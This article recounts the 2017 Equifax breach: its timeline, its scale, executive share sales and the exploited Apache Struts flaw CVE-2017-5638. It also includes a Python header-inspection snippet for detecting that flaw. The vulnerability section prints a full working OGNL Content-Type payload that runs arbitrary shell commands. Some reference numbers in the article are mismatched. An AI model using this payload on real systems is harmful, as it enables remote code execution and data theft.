Equifax Breach (2017)

6 August 2021 - Articles

In 2017 Equifax were breached. The breach was discovered on July 29[5] and an announcement was published on Sept 7.[5] It wasn’t the largest breach of all time, and not even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (34.58%).

In regards to large breaches, in the same year Yahoo “upgraded” their previous August 2013 breach to note that it was now believed to have affected all 3 billion accounts held on their systems. This figure was up from the original reported 1 billion affected accounts.[1][2][3] Yahoo noted that the stolen user information may have included names, email addresses, telephone numbers, dates of birth, MD5 hashes of passwords and in some cases encrypted or unencrypted security questions and answers.[3]

Additionally, River City Media suffered a security incident that saw 1.37 billion email/postal addresses leaked. River City Media clarified that full name, IP address and email address were included for every record whilst physical (postal) address was included for “some” accounts.[4]

These breaches dwarf the “approximately 143 million” U.S. consumers affected, which was the initial estimate, later increased to “145.5 million U.S. consumers” affected.[10] This increase additionally included 694,000 UK[21] citizens and 8,000 Canadian citizens.[9]

Initially the attack seemed to have taken place from mid-May and involved names, social security numbers, dates of birth, addresses and in some cases credit card numbers and driving license numbers.[6] However there was an earlier breach in March which Bloomberg reports was performed by the same intruders,[7] although Equifax released a statement denying the events were related:[8]

“The March event reported by Bloomberg is not related to the criminal hacking that was discovered on 29 July. Mandiant has investigated both events and found no evidence that these two separate events or the attackers were related.”

The latter breach was due to an Apache Struts vulnerability now known as CVE-2017-5638, which was publicly announced on 2017-03-06 along with a fix. An exploit was released as early as 2017-03-07,[18] although Equifax did not patch the issue until 2017-07-30,[11] putting the time to patch at 146 days.

The breach was detected on July 29th and days later four top managers sold some of their shares in Equifax. The Chief Financial Officer sold 13% of their holdings at $946,374. The President of US Information Solutions sold 9% of their holdings at $584,099. The President of Workforce Solutions sold 4% of their holdings at $250,458. Additionally a Senior VP of Investor Relations also sold shares.[13]

A special committee set up by Equifax’s board conducted an investigation. That investigation held 62 interviews and reviewed 55,000 documents, which included emails, text messages and phone logs, and determined the four had no knowledge of the breach and this was not considered insider trading. Additionally they had all gained pre-clearance to sell the stock.[14]

However the US Justice Department are reportedly investigating the share sales[16] and the Federal Trade Commission is investigating the breach.[17]

Oh, and the CEO blamed an individual person for causing the data breach by failing to communicate the requirement to apply the patch.[15][20] However the CEO retired following the breach. He received a payout of $90,000,000. The Chief Information Officer and Chief Security Officer also both retired following the breach.

On a funny angle, during the period following the announcement of the breach, Equifax official Twitter accounts accidentally (and repeatedly) misdirected users to a phishing site instead of their own information site. They intended to send them to equifaxsecurity2017.com but instead sent them to a fake site hosted by a security researcher at securityequifax2017.com.[19][23]

Finally, following their second breach the Equifax Credit Assistance site was found to be serving malicious software posing as an Adobe Flash update. They reportedly corrected this issue on October 12.[22]

Following the breach Equifax CEO, Richard Smith, testified in front of a US House subcommittee on consumer protection and detailed some of the challenges they faced following the breach – such as the fact that Hurricane Irma took down two of their larger call centres after the breach was announced.[26]

Timeline

Feb 14: Apache is notified of the Struts vulnerability.
Mar 6: Apache releases a fix for the vulnerability.
Mar 7: An exploit is made available through Exploit-DB.
May 14: The day the breach occurred according to an Equifax statement.
Jul 29: Equifax detects the breach.
Jul 30: The exploited system is patched.
Aug 1: CFO and President of U.S. Information Solutions sell shares.
Aug 2: President of Workforce Solutions sells shares.
Sep 7: Equifax announces the breach.
Sep 8: Equifax is criticized for the TrustID forcing users to waive their right to a class action lawsuit and New York Attorney General Eric Schneiderman demands the removal of the language. Equifax share price is down 13.7% since Sep 7.
Sep 9: Equifax Twitter account accidentally and repeatedly directs users to phishing site.
Sep 15: Equifax shares are down 34.58% following the breach announcement. CSO and CIO announce retirement “effective immediately”.
Sep 26: CEO announces retirement, and takes a $90,000,000 payout.
Oct 2: Equifax raises the number of affected US to 145.5 million and adds 8000 Canadians.
Oct 3: Equifax CEO blames a single individual for the breach.
Oct 10: Equifax announces 15.2m UK records compromised, of which 14.5 contain names and dates of birth, but 693,665 contain sensitive information.
Oct 12: Equifax announces it has removed malicious software from its Credit Assistance site.
Nov 3: Equifax announces it found no wrongdoing in the four executives’ share trades.
March 2018: (Former) Equifax employee pleads guilty to insider trading.[25]
July 2018: A separate (Former) Equifax executive charged with insider trading.[26]

Vulnerability Details

The vulnerability exploited was CVE-2017-5638, which is an arbitrary command execution vulnerability within Apache Struts. Several exploits have been written, with an initial proof-of-concept being released within 24 hours of the patch release day.

The vulnerability works by specifying a crafted Content-Type, Content-Disposition, or Content-Length HTTP header within an HTTP request. The headers can be crafted to include an OGNL expression which can cause arbitrary command execution, such as:

Content-Type: %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’CMD HERE’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
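From the defender's side, the header abuse described above can be caught before it reaches the framework. The following is an added example, not code from the original article or from Apache Struts: it inspects the three headers named above for OGNL expression markers and for values that do not match the shape a legitimate header would have. The function names, the validity policy and the sample requests are assumptions constructed for illustration.

```python
import re

# Headers the page names as carriers of the crafted OGNL expression.
WATCHED = ("content-type", "content-disposition", "content-length")

# OGNL expression openers plus tokens seen in the payload quoted above.
OGNL_MARKERS = re.compile(r"[%$]\{|#_memberAccess|@ognl\.|@java\.lang\.", re.I)

# Expected shape of legitimate values (assumed policy for this example).
TOKEN = r"[A-Za-z0-9!#$&^_.+-]+"
VALID = {
    "content-type": re.compile(
        rf'^{TOKEN}/{TOKEN}(\s*;\s*{TOKEN}=("[^"]*"|[^;\s"]+))*$'),
    "content-length": re.compile(r"^\d{1,15}$"),
}


def parse_headers(raw_request):
    """Return lower-cased (name, value) pairs from a raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def inspect(raw_request):
    """Return (header, reason) findings for one request; empty list if clean."""
    findings = []
    for name, value in parse_headers(raw_request):
        if name not in WATCHED:
            continue
        if OGNL_MARKERS.search(value):
            findings.append((name, "ognl-marker"))
        elif name in VALID and not VALID[name].match(value):
            findings.append((name, "malformed"))
    return findings


# Constructed sample requests (not captured traffic; the expression is inert).
BENIGN = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
          "Content-Type: multipart/form-data; boundary=----abc123\r\n"
          "Content-Length: 512\r\n\r\n")
SUSPECT = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
           "Content-Type: %{(#_='multipart/form-data').(#x=1)}\r\n"
           "Content-Length: 0\r\n\r\n")
MALFORMED = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
             "Content-Type: text/plain\r\nContent-Length: 12abc\r\n\r\n")
```

The shape check matters as much as the marker list: a Content-Type that is not a plain media type with parameters is rejected even if it avoids every listed token.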


References

  1. https://www.theverge.com/2017/10/3/16414306/yahoo-security-data-breach-3-billion-verizon
  2. https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
  3. https://help.yahoo.com/kb/account/SLN28451.html?impressions=true
  4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
  5. https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628
  6. https://www.usatoday.com/story/money/2017/09/08/equifax-shares-tumble-after-data-hack-announcement/645146001/
  7. https://www.bloomberg.com/news/articles/2017-09-18/equifax-is-said-to-suffer-a-hack-earlier-than-the-date-disclosed
  8. https://www.theguardian.com/technology/2017/sep/19/equifax-credit-firm-march-breach-massive-may-hack-customers
  9. http://www.bbc.co.uk/news/business-41575188
  10. https://www.equifaxsecurity2017.com/frequently-asked-questions/
  11. https://securestrategy.co.nz/2017/10/01/what-equifax-did-wrong/
  12. https://arstechnica.co.uk/information-technology/2017/09/equifax-hack-started-4-months-before-it-was-detected/?comments=1&post=34027857
  13. https://www.theregister.co.uk/2017/11/03/equifax_share_trade_investigation/
  14. https://uk.reuters.com/article/uk-equifax-cyber/equifax-clears-executives-who-sold-shares-after-hack-idUKKBN1D31GV
  15. https://www.theverge.com/2017/10/3/16410806/equifax-ceo-blame-breach-patch-congress-testimony
  16. http://uk.businessinsider.com/equifax-hack-justice-department-investigation-of-alleged-insider-trading-2017-9
  17. https://www.theverge.com/2017/9/14/16306872/equifax-breach-ftc-probe-lawsuit-vulnerability
  18. https://www.exploit-db.com/exploits/41570/
  19. http://www.securityweek.com/equifax-sent-breach-victims-fake-website
  20. http://money.cnn.com/2017/09/18/technology/business/equifax-breach-march-earlier/index.html
  21. https://www.equifax.co.uk/about-equifax/press-releases/en_gb/-/blogs/equifax-ltd-uk-update-regarding-the-ongoing-investigation-into-us-cyber-security-incident
  22. https://krebsonsecurity.com/2017/10/equifax-credit-assistance-site-served-spyware/
  23. https://twitter.com/AskEquifax/status/906237250438131716
  24. https://www.theguardian.com/business/2018/mar/14/equifax-insider-trading-data-breach-jun-ying-charged
  25. https://www.reuters.com/article/us-equifax-cyber-insidertrading/former-equifax-employee-pleads-guilty-to-insider-trading-idUSKBN1KD2E7
  26. https://www.theregister.co.uk/2017/10/04/sole_security_worker_at_fault_for_equifax_fail_says_former_ceo/